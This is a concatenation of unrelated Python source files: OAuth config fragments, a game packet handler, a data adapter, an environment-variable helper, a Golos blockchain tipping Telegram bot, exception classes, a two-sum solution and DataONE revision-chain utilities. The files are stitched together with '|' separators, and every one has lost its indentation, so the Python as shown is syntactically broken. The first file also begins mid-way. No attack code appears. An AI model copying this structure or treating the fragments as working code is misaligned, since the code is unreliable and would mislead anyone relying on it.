"""Function used to parse external group URIs to (UUID, extra_data) pairs."""
OAUTHCLIENT_CESNET_OPENID_STATE_TRANSFORM = 'cesnet_openid_remote.state.transform_state_data'
"""Function used to validate external group URIs."""
OAUTHCLIENT_CESNET_OPENID_PROTECTED_ROLES = ['admin']
"""Role names that shouldn't be managed/(un)assigned to users by this extension."""
OAUTHCLIENT_REST_REMOTE_APPS = dict(
eduid=CesnetOpenIdRemote().remote_app(),
)
|
from utils import utils
from enums.enums import RtIdEnum
class ServerCryptkeyGameSerializer:
data_dict = [
{'name': 'rtid', 'n_bytes': 1, 'cast': None},
{'name': 'len', 'n_bytes': 2, 'cast': utils.bytes_to_int_little},
]
def serialize(self, data: bytes):
raise Exception('Unimplemented Handler: ServerCryptkeyGameSerializer')
return utils.serialize(data, self.data_dict)
@classmethod
def build(self, key):
packet = [
{'name': __name__},
{'rtid': RtIdEnum.SERVER_CRYPTKEY_GAME},
{'key': key}
]
return packet
class ServerCryptkeyGameHandler:
def process(self, serialized, monolith, con):
raise Exception('Unimplemented Handler: ServerCryptkeyGameHandler')
|
# Copyright (C) 2020 University of Oxford
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import List, Dict
from datetime import datetime
from utils.types import FetcherType
from abc import ABC, abstractmethod
from utils.config import config
__all__ = ('AbstractAdapter',)
logger = logging.getLogger(__name__)
class AbstractAdapter(ABC):
@staticmethod
def check_if_gid_exists(kwargs: List) -> bool:
if not kwargs.get('gid'):
logger.warning(
f'GID is missing for: {kwargs.get("countrycode")}, {kwargs.get("adm_area_1")}, '
f'{kwargs.get("adm_area_2")}, {kwargs.get("adm_area_3")}, please correct your data')
@staticmethod
def date_in_window(args: Dict) -> bool:
if not config.SLIDING_WINDOW_DAYS:
return True
date = args.get('date')
if isinstance(date, str):
date = datetime.strptime(date.split(' ')[0].split('T')[0], '%Y-%m-%d')
if isinstance(date, datetime):
days = (datetime.now() - date).days
if days > config.SLIDING_WINDOW_DAYS:
return False
return True
@staticmethod
def correct_table_name(table_name: str) -> str:
if config.VALIDATE_INPUT_DATA and table_name in ['epidemiology']:
return 'staging_' + table_name
return table_name
@abstractmethod
def upsert_government_response_data(self, table_name: str, **kwargs):
raise NotImplementedError()
@abstractmethod
def upsert_epidemiology_data(self, table_name: str, **kwargs):
raise NotImplementedError()
@abstractmethod
def upsert_mobility_data(self, table_name: str, **kwargs):
raise NotImplementedError()
@abstractmethod
def get_adm_division(self, countrycode: str, adm_area_1: str = None, adm_area_2: str = None,
adm_area_3: str = None):
raise NotImplementedError()
def upsert_data(self, fetcher_type: FetcherType, **kwargs):
if not self.date_in_window(kwargs):
return
table_name = self.correct_table_name(fetcher_type.value)
if fetcher_type == FetcherType.EPIDEMIOLOGY:
return self.upsert_epidemiology_data(table_name, **kwargs)
elif fetcher_type == FetcherType.MOBILITY:
return self.upsert_mobility_data(table_name, **kwargs)
elif fetcher_type == FetcherType.GOVERNMENT_RESPONSE:
return self.upsert_government_response_data(table_name, **kwargs)
elif fetcher_type == FetcherType.WEATHER:
return self.upsert_weather_data(table_name, **kwargs)
else:
raise NotImplementedError()
def get_latest_timestamp(self, table_name: str, source: str = None):
raise NotImplementedError()
def flush(self):
pass
def call_db_function_compare(self, source_code: str) -> bool:
return False
def call_db_function_send_data(self, source_code: str):
pass
def truncate_staging(self):
pass
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
if __name__ == '__main__':
str1 = raw_input('input a string:\n')
str2 = raw_input('input a sub string:\n')
ncount = str1.count(str2)
print ncount
|
import os
from enum import Enum
NOT_PROVIDED = object()
class EnvException(Exception):
pass
class Environment(Enum):
"""
A simple Enum to provide consistency in how we detect and
represent the environment in which a service is running.
"""
PRODUCTION = ('prd', 'Production')
DEVELOPMENT = ('dev', 'Development')
LOCAL = ('lcl', 'Local')
TEST = ('test', 'Test')
def __init__(self, short_name, long_name):
self.short_name = short_name
self.long_name = long_name
self._searchable = {short_name.lower(), long_name.lower()}
@property
def is_deployed(self):
return self in {self.PRODUCTION, self.DEVELOPMENT}
@classmethod
def _missing_(cls, value):
"""
Extends the default value lookup behavior
Environment(('prd', 'Production')) to accept either string (case-
insensitive).
>>> assert Environment.PRODUCTION is Environment('prd') is Environment('PRODUCTION')
"""
for member in list(cls):
if value.lower() in member._searchable:
return member
return super()._missing_(value)
class Env:
def get(self, key, default=NOT_PROVIDED, required=True, coerce=NOT_PROVIDED):
try:
val = os.environ[key].strip()
except KeyError as e:
if default is not NOT_PROVIDED:
return default
if not required:
return None
raise EnvException('Missing key "{}"'.format(key)) from e
if coerce is not NOT_PROVIDED:
val = coerce(val)
return val
def get_environment(self, key, default=NOT_PROVIDED, required=True):
return self.get(key, default=default, required=required, coerce=Environment)
def get_int(self, key, default=NOT_PROVIDED, required=True):
try:
return self.get(key, default=default, required=required,
coerce=int)
except ValueError as e:
raise EnvException('Could not get int: {}'.format(e)) from e
def get_bool(self, key, default=NOT_PROVIDED, required=True):
def is_bool(val):
if val == '1':
return True
elif val == '0':
return False
else:
raise ValueError(f"{key} must be '1' or '0' (got '{val}')")
return self.get(key, default=default, required=required, coerce=is_bool)
def get_csv(self, key, default=NOT_PROVIDED, required=True):
def splitter(val):
return [s.strip() for s in val.split(',') if s.strip()]
return self.get(key, default=default, required=required,
coerce=splitter)
def get_tokens(self, key, default=NOT_PROVIDED, required=True):
def splitter(val):
return [s.strip() for s in val.split() if s.strip()]
return self.get(key, default=default, required=required,
coerce=splitter)
def get_key(self, guard_type, key, required=True):
BEGIN_GUARD = '-----BEGIN {}-----'.format(guard_type)
END_GUARD = '-----END {}-----'.format(guard_type)
LINE_LENGTH = 64
val = self.get(key, required=required)
if not val:
return val
# ensure key begins and ends with guards
if not val.startswith(BEGIN_GUARD) or not val.endswith(END_GUARD):
raise EnvException('Key must have proper BEGIN and END guards')
# if val already has newlines, we assume it's in the right format
if '\n' in val:
return val
val = val[len(BEGIN_GUARD):-len(END_GUARD)]
key_lines = [BEGIN_GUARD]
while val:
key_lines.append(val[:LINE_LENGTH])
val = val[LINE_LENGTH:]
key_lines.append(END_GUARD)
return '\n'.join(key_lines)
_default = Env() # no prefix for module-based use
get = _default.get
get_bool = _default.get_bool
get_csv = _default.get_csv
get_environment = _default.get_environment
get_int = _default.get_int
get_key = _default.get_key
get_tokens = _default.get_tokens
|
# -*- coding: utf-8 -*-
import json
from pprint import pprint
from time import sleep, time
from ttgbase.api import Api, Menu
import menu
from tgolosbase.api import Api as GolosApi
from lib.golos import Golos, Claim
from storage import token, maska, golos_reg
class Tip23(Golos, Claim):
def __init__(self):
self.token = token
self.maska = maska
self.golos_reg_bot = golos_reg["account"]
self.golos_reg_wif = golos_reg["wif"]
self.golos_reg_fee = golos_reg["fee"]
# Подключаем фразы бота
import msg as bot_msg
self.bot_msg = bot_msg
self.tg = Api(self.token, report=True)
self.prepare_commands()
self.golos = GolosApi(report=True)
self.bot_menu = Menu(menu.menu, self.commands, self.tg)
##### ##### TG COMMANDS ##### #####
def prepare_commands(self):
self.tg.commands["private_text"] = self.private_text
self.tg.commands["private_entities"] = self.private_entities
self.tg.commands["chat_text"] = self.chat_text
self.tg.commands["chat_entities"] = self.chat_entities
self.tg.commands["chat_reply"] = self.chat_reply
self.commands = {
"help:Intro": self.help_intro,
"help:Reg": self.help_reg,
"golossign": self.golossign,
"goloslogin": self.goloslogin,
"goloswallet": self.goloswallet,
"golosclaimlogin": self.golosclaimlogin,
"golosclaimwif": self.golosclaimwif,
"golosclaim:Info": self.golosclaiminfo,
"golosclaim:Delete": self.golosclaiminfo,
"golosclaimdel": self.golosclaimdel,
"golos:Info": self.golosinfo,
"golosinfo:ClaimNow": self.golosclaimnow,
"golosreg": self.golosreg,
"golosregYN:Yes": self.golosregyes,
"golosdelYN:Yes": self.golosdelyes,
"language:Russian": self.language,
"language:English": self.language,
"report:On": self.report,
"report:Off": self.report,
}
##### ##### CHAT ##### #####
def private_text(self, message):
self.bot_menu.resolve(message)
def private_entities(self, message):
self.bot_menu.resolve(message)
pass
def chat_text(self, message):
#print(message["chat"]["id"], message["text"])
#tg.send_message(message["chat"]["id"], 'get text')
pass
def chat_entities(self, message):
user_id, chat_id, lng = self.get_params_chat(message)
cmd = message["text"]
cmd_all = ['/golos+', '/golos-']
if (user_id in self.bot_menu.users_tg) and (cmd in cmd_all):
db = self.bot_menu.users_tg[user_id]
print(self.maska, 'CMD', chat_id, user_id, cmd)
if cmd in ['/golos+', '/golos-']:
target_account, target_chat, asset = 'golosaccount', 'goloschat', 'GOLOS'
if cmd == '/golos+':
initiator = db.get(target_account, None)
if initiator:
account, wif = initiator.split(':')
db.setdefault(target_chat, [])
if chat_id not in db[target_chat]:
tx = self.golos.get_accounts([account])[0]
try:
msg = ' '.join([' +' + str(int(tx["TIP"])), asset])
except:
msg = ' error data'
db[target_chat].append(chat_id)
self.tg.send_message(chat_id, self.bot_msg.InvestorBecome[lng] + msg, delete=True)
self.bot_menu.save()
else:
self.tg.send_message(chat_id, self.bot_msg.InvestorAlready[lng], delete=True)
else:
self.tg.send_message(chat_id, self.bot_msg.MustConnectAccount[lng], delete=True)
if cmd == '/golos-':
chat_list = db.get(target_chat, [])
if chat_id in chat_list:
db[target_chat].remove(chat_id)
self.tg.send_message(chat_id, self.bot_msg.InvestorWithdraw[lng] + asset, delete=True)
self.bot_menu.save()
def chat_reply(self, message):
user_id, chat_id, lng = self.get_params_chat(message)
text = message["text"]
user_name = '@' + str(message["from"].get("username", ''))
message_id = str(message["message_id"])
title = str(message["chat"]["title"])
reply_id = str(message["reply_to_message"]["from"]["id"])
reply_username = '@' + str(message["reply_to_message"]["from"].get("username", ''))
reply_text = str(message["reply_to_message"].get("text", ''))
is_bot = str(message["reply_to_message"]["from"]["is_bot"])
k_like, amount = text.count('+', 0, 5), 0
if 'tip' == text[:3].lower():
try:
amount = int(text.split()[0].lower().replace('tip', ''))
except:
amount = 1
flag_for_del = True if k_like > 0 and len(text) <= 5 else False
if flag_for_del:
payload = [chat_id, message_id, self.tg.DEL_DELAY]
self.tg.delete_message(payload)
#if (k_like > 0) and (user_id != reply_id) and (str(is_bot) == 'False'): # Если есть хоть один +, не самоап и не бот
if (k_like > 0 or amount > 0) and (str(is_bot) == 'False'): # TEST for TEST Если есть хоть один +, самоап и не бот
print(self.maska, user_id, reply_id, k_like, amount)
if user_id in self.bot_menu.users_tg and reply_id in self.bot_menu.users_tg: # Если юзеры в базе
flag = False # Отслеживаем в целом инвестора
reports = []
for target in ['golos']:
state_acc, target_chat, wallet_acc = target + 'account', target + 'chat', target + 'wallet'
chat_list = self.bot_menu.users_tg[user_id].get(target_chat, [])
if chat_id in chat_list:
flag = True
asset_account = self.bot_menu.users_tg[user_id].get(state_acc, None)
asset_account_for_donate = self.bot_menu.users_tg[reply_id].get(wallet_acc, None)
if asset_account and asset_account_for_donate: # Если оба в базе
account, wif = asset_account.split(':')
account_for_donate = asset_account_for_donate
report = None
if 'golos' == target:
lines, comment = text.split(), ''
if len(lines) >= 2: comment = ' '.join(lines[1:])
report = self.golos_donate(account, k_like, title, reply_text, account_for_donate, wif, amount=amount, comment=comment)
if report:
reports.append(report)
elif asset_account and (not asset_account_for_donate): # Если нет кому донатить
msg = self.bot_msg.NoProfileForDonate[lng] + ' ' + target.upper()
self.tg.send_message(chat_id, msg, delete = True)
for amount, report in reports:
# report
msg = ''.join([' +', amount, report])
self.tg.send_message(chat_id, reply_username + msg, delete = True)
if self.bot_menu.users_tg[user_id].get("report", True):
self.tg.send_message(user_id, 'donate to ' + reply_username + msg)
if self.bot_menu.users_tg[reply_id].get("report", True):
self.tg.send_message(reply_id, 'received from ' + user_name + msg)
if not flag:
self.tg.send_message(chat_id, self.bot_msg.InvestorNot[lng], delete = True)
##### ##### HELP ##### #####
def help_intro(self, message):
msg = 'https://golos.in/ru--blokcheijn/@ksantoprotein/tip23bot-telegramm-bot-dlya-laikov-avtokleminga-i-igr'
self.tg.send_message(message["chat"]["id"], msg)
def help_reg(self, message):
msg = 'https://golos.in/ru--golos/@ksantoprotein/thallid-pom-bot-instrukciya-registraciya'
self.tg.send_message(message["chat"]["id"], msg)
##### ##### GET ##### #####
def get_language(self, user_id):
if user_id in self.bot_menu.users_tg:
lng = self.bot_menu.users_tg[user_id].get("language", 'Russian')
else:
lng = 'Russian'
return lng
def get_chats(self, chat_list):
chats = []
for chat_id in chat_list:
tx = self.tg.getChat(str(chat_id))
if tx:
chat = ''.join(['@', tx.get("username", ''), ':', tx.get("title", '')])
chats.append(chat)
else:
print('error in chat', chat_id)
chats.append('hidden')
return chats
def get_params_message(self, message, type):
user_id = str(message["chat"]["id"])
lng = self.get_language(user_id)
keyboard = self.bot_menu.state[type]["keyboard"]
db = self.bot_menu.users_tg[user_id]
return([user_id, lng, keyboard, db])
def get_params_chat(self, message):
user_id = str(message["from"]["id"])
chat_id = str(message["chat"]["id"])
lng = self.get_language(user_id)
#db = self.bot_menu.users_tg[user_id]
return([user_id, chat_id, lng])
##### ##### ##### ##### #####
def language(self, message):
lng = message["text"]
user_id = str(message["chat"]["id"])
if lng in ['Russian', 'English']:
self.bot_menu.users_tg[user_id]["language"] = lng
def report(self, message):
type_report = True if message["text"] == 'On' else False
user_id = str(message["chat"]["id"])
self.bot_menu.users_tg[user_id].setdefault("report", True)
self.bot_menu.users_tg[user_id]["report"] = type_report
bot = Tip23()
bot.tg.run()
while True:
print('check claim')
bot.check_claim()
sleep(60*10)
#admin = input()
#if admin == 'exit':
# break
#else:
# print(bot.maska)
|
class APIError(Exception):
pass
class MultipleRowsError(Exception):
pass
class DoesNotExistError(Exception):
pass
class OperationalError(Exception):
pass
class FetchError(Exception):
def __init__(self, error):
super().__init__()
self.error = error
class TimeoutError(Exception):
"""Raised when a connection pool times out on getting a connection."""
class ConnectionError(Exception):
pass
|
from collections import defaultdict
from typing import List
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
complement_dict = defaultdict(int)
for i, num in enumerate(nums):
if target - num in complement_dict:
return [complement_dict[target - num], i]
complement_dict[num] = i
"""
Runtime O(N)
Space complexity O(N)
Runtime: 48 ms, faster than 79.33% of Python3 online submissions for Two Sum.
Memory Usage: 14.3 MB, less than 53.95% of Python3 online submissions for Two Sum.
"""
|
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for manipulating revision chains in the database."""
import d1_common.types.exceptions
import d1_gmn.app
import d1_gmn.app.did
import d1_gmn.app.model_util
import d1_gmn.app.models
def create_or_update_chain(pid, sid, obsoletes_pid, obsoleted_by_pid):
chain_model = _get_chain_by_pid(pid)
if chain_model:
_set_chain_sid(chain_model, sid)
else:
_add_sciobj(pid, sid, obsoletes_pid, obsoleted_by_pid)
_update_sid_to_last_existing_pid_map(pid)
def delete_chain(pid):
pid_to_chain_model = d1_gmn.app.models.ChainMember.objects.get(pid__did=pid)
chain_model = pid_to_chain_model.chain
pid_to_chain_model.delete()
if not d1_gmn.app.models.ChainMember.objects.filter(chain=chain_model).exists():
if chain_model.sid:
# Cascades back to chain_model.
d1_gmn.app.models.IdNamespace.objects.filter(
did=chain_model.sid.did
).delete()
else:
chain_model.delete()
def cut_from_chain(sciobj_model):
"""Remove an object from a revision chain.
The object can be at any location in the chain, including the head or tail.
Preconditions:
- The object with the pid is verified to exist and to be a member of an
revision chain. E.g., with:
d1_gmn.app.views.asserts.is_existing_object(pid)
d1_gmn.app.views.asserts.is_in_revision_chain(pid)
Postconditions:
- The given object is a standalone object with empty obsoletes, obsoletedBy and
seriesId fields.
- The previously adjacent objects in the chain are adjusted to close any gap that
was created or remove dangling reference at the head or tail.
- If the object was the last object in the chain and the chain has a SID, the SID
reference is shifted over to the new last object in the chain.
"""
if _is_head(sciobj_model):
old_pid = sciobj_model.obsoletes.did
_cut_head_from_chain(sciobj_model)
elif _is_tail(sciobj_model):
old_pid = sciobj_model.obsoleted_by.did
_cut_tail_from_chain(sciobj_model)
else:
old_pid = sciobj_model.obsoleted_by.did
_cut_embedded_from_chain(sciobj_model)
_update_sid_to_last_existing_pid_map(old_pid)
def get_all_pid_by_sid(sid):
return [c.pid.did for c in _get_all_chain_member_queryset_by_sid(sid)]
# def set_revision(pid, obsoletes_pid=None, obsoleted_by_pid=None):
# sciobj_model = d1_gmn.app.util.get_sci_model(pid)
# set_revision_links(sciobj_model, obsoletes_pid, obsoleted_by_pid)
# sciobj_model.save()
def resolve_sid(sid):
"""Get the PID to which the ``sid`` currently maps.
Preconditions:
- ``sid`` is verified to exist. E.g., with d1_gmn.app.views.asserts.is_sid().
"""
return d1_gmn.app.models.Chain.objects.get(sid__did=sid).head_pid.did
def get_sid_by_pid(pid):
"""Given the ``pid`` of the object in a chain, return the SID for the chain.
Return None if there is no SID for the chain. This operation is also valid
for standalone objects which may or may not have a SID.
This is the reverse of resolve.
All known PIDs are associated with a chain.
Preconditions:
- ``pid`` is verified to exist. E.g., with
d1_gmn.app.views.asserts.is_existing_object().
"""
return d1_gmn.app.did.get_did_by_foreign_key(_get_chain_by_pid(pid).sid)
def set_revision_links(sciobj_model, obsoletes_pid=None, obsoleted_by_pid=None):
if obsoletes_pid:
sciobj_model.obsoletes = d1_gmn.app.did.get_or_create_did(obsoletes_pid)
_set_revision_reverse(sciobj_model.pid.did, obsoletes_pid, is_obsoletes=False)
if obsoleted_by_pid:
sciobj_model.obsoleted_by = d1_gmn.app.did.get_or_create_did(obsoleted_by_pid)
_set_revision_reverse(sciobj_model.pid.did, obsoleted_by_pid, is_obsoletes=True)
sciobj_model.save()
def is_obsoletes_pid(pid):
"""Return True if ``pid`` is referenced in the obsoletes field of any object.
This will return True even if the PID is in the obsoletes field of an object that
does not exist on the local MN, such as replica that is in an incomplete chain.
"""
return d1_gmn.app.models.ScienceObject.objects.filter(obsoletes__did=pid).exists()
def is_obsoleted_by_pid(pid):
"""Return True if ``pid`` is referenced in the obsoletedBy field of any object.
This will return True even if the PID is in the obsoletes field of an object that
does not exist on the local MN, such as replica that is in an incomplete chain.
"""
return d1_gmn.app.models.ScienceObject.objects.filter(
obsoleted_by__did=pid
).exists()
def is_revision(pid):
"""Return True if ``pid`` is referenced in the obsoletes or obsoletedBy field of any
object.
This will return True even if the PID is in the obsoletes field of an object that
does not exist on the local MN, such as replica that is in an incomplete chain.
"""
return is_obsoletes_pid(pid) or is_obsoleted_by_pid(pid)
def _add_sciobj(pid, sid, obsoletes_pid, obsoleted_by_pid):
is_added = _add_to_chain(pid, sid, obsoletes_pid, obsoleted_by_pid)
if not is_added:
# if not obsoletes_pid and not obsoleted_by_pid:
_add_standalone(pid, sid)
# else:
def _add_standalone(pid, sid):
# assert_sid_unused(sid)
_create_chain(pid, sid)
def _add_to_chain(pid, sid, obsoletes_pid, obsoleted_by_pid):
_assert_sid_is_in_chain(sid, obsoletes_pid)
_assert_sid_is_in_chain(sid, obsoleted_by_pid)
obsoletes_chain_model = _get_chain_by_pid(obsoletes_pid)
obsoleted_by_chain_model = _get_chain_by_pid(obsoleted_by_pid)
sid_chain_model = _get_chain_by_sid(sid) if sid else None
chain_model = obsoletes_chain_model or obsoleted_by_chain_model or sid_chain_model
if not chain_model:
return False
if obsoletes_chain_model and obsoletes_chain_model != chain_model:
_merge_chains(chain_model, obsoletes_chain_model)
if obsoleted_by_chain_model and obsoleted_by_chain_model != chain_model:
_merge_chains(chain_model, obsoleted_by_chain_model)
_add_pid_to_chain(chain_model, pid)
_set_chain_sid(chain_model, sid)
return True
def _merge_chains(chain_model_a, chain_model_b):
"""Merge two chains.
For use when it becomes known that two chains that were created separately
actually are separate sections of the same chain
E.g.:
- A obsoleted by X is created. A has no SID. X does not exist yet. A chain is
created for A.
- B obsoleting Y is created. B has SID. Y does not exist yet. A chain is created
for B.
- C obsoleting X, obsoleted by Y is created. C tells us that X and Y are in the
same chain, which means that A and B are in the same chain. At this point, the
two chains need to be merged. Merging the chains causes A to take on the SID of
B.
"""
_set_chain_sid(
chain_model_a, d1_gmn.app.did.get_did_by_foreign_key(chain_model_b.sid)
)
for member_model in _get_all_chain_member_queryset_by_chain(chain_model_b):
member_model.chain = chain_model_a
member_model.save()
chain_model_b.delete()
def _add_pid_to_chain(chain_model, pid):
chain_member_model = d1_gmn.app.models.ChainMember(
chain=chain_model, pid=d1_gmn.app.did.get_or_create_did(pid)
)
chain_member_model.save()
def _set_chain_sid(chain_model, sid):
"""Set or update SID for chain.
If the chain already has a SID, ``sid`` must either be None or match the existing
SID.
"""
if not sid:
return
if chain_model.sid and chain_model.sid.did != sid:
raise d1_common.types.exceptions.ServiceFailure(
0,
"Attempted to modify existing SID. "
'existing_sid="{}", new_sid="{}"'.format(chain_model.sid.did, sid),
)
chain_model.sid = d1_gmn.app.did.get_or_create_did(sid)
chain_model.save()
def _assert_sid_is_in_chain(sid, pid):
if not sid or not pid:
return
chain_model = _get_chain_by_pid(pid)
if not chain_model or not chain_model.sid:
return
if chain_model.sid.did != sid:
raise d1_common.types.exceptions.ServiceFailure(
0,
"Attempted to create object in chain with non-matching SID. "
'existing_sid="{}", new_sid="{}"'.format(chain_model.sid.did, sid),
)
def _find_head_or_latest_connected(pid, last_pid=None):
"""Find latest existing sciobj that can be reached by walking towards the head from
``pid``
If ``pid`` does not exist, return None. If chain is connected all the way to head
and head exists, return the head. If chain ends in a dangling obsoletedBy, return
the last existing object.
"""
try:
sci_model = d1_gmn.app.model_util.get_sci_model(pid)
except d1_gmn.app.models.ScienceObject.DoesNotExist:
return last_pid
if sci_model.obsoleted_by is None:
return pid
return _find_head_or_latest_connected(sci_model.obsoleted_by.did, pid)
def _get_chain_by_pid(pid):
"""Find chain by pid.
Return None if not found.
"""
try:
return d1_gmn.app.models.ChainMember.objects.get(pid__did=pid).chain
except d1_gmn.app.models.ChainMember.DoesNotExist:
pass
def _get_chain_by_sid(sid):
"""Return None if not found."""
try:
return d1_gmn.app.models.Chain.objects.get(sid__did=sid)
except d1_gmn.app.models.Chain.DoesNotExist:
pass
def _update_sid_to_last_existing_pid_map(pid):
"""Set chain head PID to the last existing object in the chain to which ``pid``
belongs. If SID has been set for chain, it resolves to chain head PID.
Intended to be called in MNStorage.delete() and other chain manipulation.
Preconditions:
- ``pid`` must exist and be verified to be a PID.
d1_gmn.app.views.asserts.is_existing_object()
"""
last_pid = _find_head_or_latest_connected(pid)
chain_model = _get_chain_by_pid(last_pid)
if not chain_model:
return
chain_model.head_pid = d1_gmn.app.did.get_or_create_did(last_pid)
chain_model.save()
def _create_chain(pid, sid):
"""Create the initial chain structure for a new standalone object. Intended to be
called in MNStorage.create().
Preconditions:
- ``sid`` must be verified to be available to be assigned to a new standalone
object. E.g., with is_valid_sid_for_new_standalone().
"""
chain_model = d1_gmn.app.models.Chain(
# sid=d1_gmn.app.models.did(sid) if sid else None,
head_pid=d1_gmn.app.did.get_or_create_did(pid)
)
chain_model.save()
_add_pid_to_chain(chain_model, pid)
_set_chain_sid(chain_model, sid)
return chain_model
# def _get_or_create_chain_for_pid(pid):
# try:
# return d1_gmn.app.models.ChainMember.objects.get(pid__did=pid).chain
# except d1_gmn.app.models.ChainMember.DoesNotExist:
# return _create_chain(pid, None)
def _map_sid_to_pid(chain_model, sid, pid):
if sid is not None:
chain_model.sid = d1_gmn.app.did.get_or_create_did(sid)
chain_model.head_pid = d1_gmn.app.did.get_or_create_did(pid)
chain_model.save()
def _get_all_chain_member_queryset_by_sid(sid):
return d1_gmn.app.models.ChainMember.objects.filter(
chain=d1_gmn.app.models.Chain.objects.get(sid__did=sid)
)
def _get_all_chain_member_queryset_by_chain(chain_model):
return d1_gmn.app.models.ChainMember.objects.filter(chain=chain_model)
def _cut_head_from_chain(sciobj_model):
new_head_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoletes.did)
new_head_model.obsoleted_by = None
sciobj_model.obsoletes = None
sciobj_model.save()
new_head_model.save()
def _cut_tail_from_chain(sciobj_model):
new_tail_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoleted_by.did)
new_tail_model.obsoletes = None
sciobj_model.obsoleted_by = None
sciobj_model.save()
new_tail_model.save()
def _cut_embedded_from_chain(sciobj_model):
prev_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoletes.did)
next_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoleted_by.did)
prev_model.obsoleted_by = next_model.pid
next_model.obsoletes = prev_model.pid
sciobj_model.obsoletes = None
sciobj_model.obsoleted_by = None
sciobj_model.save()
prev_model.save()
next_model.save()
def _is_head(sciobj_model):
return sciobj_model.obsoletes and not sciobj_model.obsoleted_by
def _is_tail(sciobj_model):
return sciobj_model.obsoleted_by and not sciobj_model.obsoletes
def _set_revision_reverse(to_pid, from_pid, is_obsoletes):
try:
sciobj_model = d1_gmn.app.model_util.get_sci_model(from_pid)
except d1_gmn.app.models.ScienceObject.DoesNotExist:
return
if not d1_gmn.app.did.is_existing_object(to_pid):
return
did_model = d1_gmn.app.did.get_or_create_did(to_pid)
if is_obsoletes:
sciobj_model.obsoletes = did_model
else:
sciobj_model.obsoleted_by = did_model
sciobj_model.save()
# def assert_sid_unused(sid):
# if not sid:
# return
# if find_chain_by_sid(sid):
# raise d1_common.types.exceptions.ServiceFailure(
# 0, u'Attempted to create standalone object with SID already in use. '
# 'sid="{}"'.format(sid)
# )
# def upd_sid_resolve(pid, sid=None, obsoletes_pid=None, obsoleted_by_pid=None):
# """Set SID to resolve to the newest object that exists locally for a chain"""
#
# last_pid = find_head_or_latest_connected(pid)
# def has_chain(pid):
# return d1_gmn.app.models.ChainMember.objects.filter(pid__did=pid).exists()
# def create_chain(sid, pid):
# """Create the initial chain structure for a new standalone object. Intended to
# be called in MNStorage.create().
#
# Preconditions:
# - ``sid`` must either be None or be previously unused.
# d1_gmn.app.views.asserts.is_unused()
# - ``pid`` must exist and be verified to be a PID.
# d1_gmn.app.views.asserts.is_pid()
# """
# chain_model = _get_or_create_chain_for_pid(pid)
# _map_sid_to_pid(chain_model, sid, pid)
# def add_pid_to_chain(sid, old_pid, new_pid):
# """Add a new revision ``new_pid`` to the chain that ``old_pid`` belongs to and
# update any SID to resolve to the new PID. Intended to be called in
# MNStorage.update().
#
# Preconditions:
# - ``sid`` must either be None or match the SID already assigned to the chain.
# - Both ``old_pid`` and ``new_pid`` must exist and be verified to be PIDs
# d1_gmn.app.views.asserts.is_pid()
# """
# chain_model = _get_or_create_chain_for_pid(old_pid)
# _add_pid_to_chain(chain_model, new_pid)
# _map_sid_to_pid(chain_model, sid, new_pid)
# def is_sid_in_revision_chain(sid, pid):
# """Determine if ``sid`` resolves to an object in the revision chain to which
# ``pid`` belongs.
#
# Preconditions:
# - ``sid`` is verified to exist. E.g., with d1_gmn.app.views.asserts.is_sid().
# """
# chain_pid_list = get_pids_in_revision_chain(pid)
# resolved_pid = resolve_sid(sid)
# return resolved_pid in chain_pid_list
# def update_or_create_sid_to_pid_map(sid, pid):
# """Update existing or create a new ``sid`` to ``pid`` association. Then create
# or update the ``sid`` to resolve to the ``pid``.
#
# Preconditions:
# - ``sid`` is verified to be unused if creating a standalone object (that may later become
# the first object in a chain).
# - ``sid`` is verified to belong to the given chain updating.
# - ``pid`` is verified to exist. E.g., with d1_gmn.app.views.asserts.is_pid().
# """
# d1_gmn.app.models.sid_to_pid(sid, pid)
# d1_gmn.app.models.sid_to_head_pid(sid, pid)
# def get_sid_by_pid(pid):
# """Get the SID to which the ``pid`` maps.
# Return None if there is no SID maps to ``pid``.
# """
# try:
# return d1_gmn.app.models.SeriesIdToPersistentId.objects.get(
# pid__did=pid
# ).sid.did
# except d1_gmn.app.models.SeriesIdToPersistentId.DoesNotExist:
# return None
# def move_sid_to_last_object_in_chain(pid):
# """Move SID to the last object in a chain to which ``pid`` belongs.
#
# - If the chain does not have a SID, do nothing.
# - If the SID already maps to the last object in the chain, do nothing.
#
# A SID always resolves to the last object in its chain. So System Metadata XML
# docs are used for introducing SIDs and setting initial mappings, but the
# database maintains the current mapping going forward.
#
# Preconditions:
# - PID is verified to exist. E.g., with d1_gmn.app.views.asserts.is_pid().
#
# Postconditions:
# - The SID maps to the last object in the chain.
# """
# sid = sysmeta_db.get_sid_by_pid(pid)
# if sid:
# chain_pid_list = sysmeta_db.get_pids_in_revision_chain(pid)
# update_sid(sid, chain_pid_list[-1])
# def update_revision_chain(pid, obsoletes_pid, obsoleted_by_pid, sid):
# with sysmeta_file.SysMetaFile(pid) as sysmeta_pyxb:
# sysmeta_file.update_revision_chain(
# sysmeta_pyxb, obsoletes_pid, obsoleted_by_pid, sid
# )
# sysmeta_db.update_revision_chain(sysmeta_pyxb)
# if sysmeta.obsoletes is not None:
# chain_pid_list = [pid]
# sci_obj = mn.models.ScienceObject.objects.get(pid__did=pid)
# while sci_obj.obsoletes:
# obsoletes_pid = sysmeta_pyxb.obsoletes.value()
# chain_pid_list.append(obsoletes_pid)
